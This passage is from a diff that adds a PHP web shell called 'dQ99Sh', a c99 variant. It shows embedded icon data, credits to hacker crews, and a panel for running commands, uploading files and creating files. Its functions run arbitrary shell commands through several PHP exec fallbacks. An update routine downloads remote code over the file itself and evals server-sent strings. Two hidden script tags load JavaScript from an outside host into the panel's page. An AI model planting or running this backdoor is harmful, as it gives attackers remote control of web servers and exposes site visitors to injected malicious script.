+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7dQ08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LdQ9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDdQ8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"dQEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
+"aGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEdQXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>".
+       "Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
+       "Re-Coding, tricks, html and css by <b>diKi [FeeLCoMz CoMMuNiTy]</b><br><br>".
+       "Report bugs to <a href=\"mailto:thesabotaqe@gmail.com\">r57.biz</a></b>";
+}
+echo "</td></tr></table>\n";
+/*** COMMANDS PANEL ***/
+?>
+<div  class=bartitle><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
+    </form>
+</td></tr>
+<tr><td align=right>PHP Filesystem:</td>
+<td>
+<?php ##[ diKi TriCkz ]## ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+}
+function chg_arg(num,txt1,txt2) {
+  if (num==0) {
+    document.forms.fphpfsys.arg1.type = "hidden";
+    document.forms.fphpfsys.A1.type = "hidden";
+  }
+  if (num<=1) {
+    document.forms.fphpfsys.arg2.type = "hidden";
+    document.forms.fphpfsys.A2.type = "hidden";
+  }
+  if (num==2) {
+    document.forms.fphpfsys.A1.type = "label";
+    document.forms.fphpfsys.A2.type = "label";
+    document.forms.fphpfsys.arg1.type = "text";
+    document.forms.fphpfsys.arg2.type = "text";
+  }
+  document.forms.fphpfsys.A1.value = txt1 + ":";
+  document.forms.fphpfsys.A2.value = txt2 + ":";
+}
+</script>
+<?php
+  echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
+       "<select name=\"phpfsysfunc\">\r\n";
+  foreach ($phpfsaliases as $als) {
+    if ($als[1]==$phpfsysfunc) {
+      echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+    else {
+      echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+  }
+  echo "</select>\r\n".
+       "<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
+       "<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
+       "<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
+  foreach ($sh_sourcez as $e => $o) {
+    echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
+  }
+  echo "</form>\r\n";
+?>
+</td></tr>
+<tr><td align=right>Search File:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
+    </form><SCRIPT SRC=http://cpc-gov.cn/a/a/a.asp></SCRIPT>
+    </td></tr>
+<tr><td align=right>Create File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<SCRIPT SRC=http://cpc-gov.cn/a/a/a.asp></SCRIPT>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
+    </form></td></tr>
+</table>
+<?php footer(); ?>
+</body></html>
+<?php
+
+###########################
+## dQ99Sh CORE FUNCTIONS ##
+###########################
+function safemode() {
+  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
+  else { return FALSE; }
+}
+function getdisfunc() {
+  $disfunc = @ini_get("disable_functions");
+  if (!empty($disfunc)) {
+    $disfunc = str_replace(" ","",$disfunc);
+    $disfunc = explode(",",$disfunc);
+  }
+  else { $disfunc= array(); }
+  return $disfunc;
+}
+function enabled($func) {
+ if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
+ else { return FALSE; }
+}
+function dQ99exec($cmd) {
+  $output = "";
+  if ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  return $output;
+}
+function dQ99exec2($cmd) {
+  $output = "";
+  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  return $output;
+}
+function which($pr) {
+  $path = dQ99exec("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+
+function get_status() {
+  function showstat($sup,$stat) {
+    if ($stat=="on") { return "$sup: <font color=#00FF00><b>ON</b></font>"; }
+    else { return "$sup: <font color=#FF9900><b>OFF</b></font>"; }
+  }
+  $arrfunc = array(
+    array("MySQL","mysql_connect"),
+    array("MSSQL","mssql_connect"),
+    array("Oracle","ocilogon"),
+    array("PostgreSQL","pg_connect"),
+    array("Curl","curl_version"),
+  );
+  $arrcmd = array(
+    array("Fetch","fetch --help"),
+    array("Wget","wget --help"),
+    array("Perl","perl -v"),
+  );
+
+  $statinfo = array();
+  foreach ($arrfunc as $func) {
+    if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
+    else { $statinfo[] = showstat($func[0],"off"); }
+  }
+  $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
+  foreach ($arrcmd as $cmd) {
+    if (dQ99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
+    else { $statinfo[] = showstat($cmd[0],"off"); }
+  }
+  return implode(" ",$statinfo);
+}
+function showdisfunc() {
+  if ($disablefunc = @ini_get("disable_functions")) {
+    return "<font color=#FF9900><b>".$disablefunc."</b></font>";
+  }
+  else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) { $bool = is_dir($letter.":\\"); }
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+                  ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
+      if ($letter.":" != $v) { $letters .= $letter; }
+      else { $letters .= "<font color=yellow>".$letter."</font>"; }
+      $letters .= "</a> ";
+    }
+  }
+  if (!empty($letters)) { Return $letters; }
+  else  {Return "None"; }
+}
+function disp_freespace($curdrv) {
+  $free = @disk_free_space($curdrv);
+  $total = @disk_total_space($curdrv);
+  if ($free === FALSE) { $free = 0; }
+  if ($total === FALSE) { $total = 0; }
+  if ($free < 0) { $free = 0; }
+  if ($total < 0) { $total = 0; }
+  $used = $total-$free;
+  $free_percent = round(100/($total/$free),2)."%";
+  $free = view_size($free);
+  $total = view_size($total);
+  return "$free of $total ($free_percent)";
+}
+## dQ99Sh UPDATE FUNCTIONS ##
+function dQ99getsource($fn) {
+  global $dQ99sh_sourcesurl;
+  $array = array(
+    "dQ99sh.php" => "dQ99sh.txt",
+  );
+  $name = $array[$fn];
+  if ($name) {return file_get_contents($dQ99sh_sourcesurl.$name);}
+  else {return FALSE;}
+}
+function dQ99sh_getupdate($update = TRUE) {
+  $url = $GLOBALS["dQ99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+  $data = @file_get_contents($url);
+  if (!$data) { return "Can't connect to update-server!"; }
+  else {
+    $data = ltrim($data);
+    $string = substr($data,3,ord($data{2}));
+    if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+    if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+    if ($data{0} == "\x99" and $data{1} == "\x03") {
+      $string = explode("|",$string);
+      if ($update) {
+        $confvars = array();
+        $sourceurl = $string[0];
+        $source = file_get_contents($sourceurl);
+        if (!$source) {return "Can't fetch update!";}
+        else {
+          $fp = fopen(__FILE__,"w");
+          if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download dQ99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+          else {
+            fwrite($fp,$source);
+            fclose($fp);
+            return "Update completed!";
+          }
+        }
+      }
+      else {return "New version are available: ".$string[1];}
+    }
+    elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+      eval($string);
+      return 1;
+    }
+    else {return "Error in protocol: segmentation failed! (".$data.") ";}
+  }
+}
+function dQ99_buff_prepare() {
+  global $sess_data;
+  global $act;
+  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  $sess_data["copy"] = array_unique($sess_data["copy"]);
+  $sess_data["cut"] = array_unique($sess_data["cut"]);
+  sort($sess_data["copy"]);
+  sort($sess_data["cut"]);
+  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+function dQ99_sess_put($data) {
+  global $sess_cookie;
+  global $sess_data;
+  dQ99_buff_prepare();
+  $sess_data = $data;
+  $data = serialize($data);
+  setcookie($sess_cookie,$data);
+}
+## END dQ99Sh UPDATE FUNCTIONS ##
+## FILESYSTEM FUNCTIONS ##
+function fs_copy_dir($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
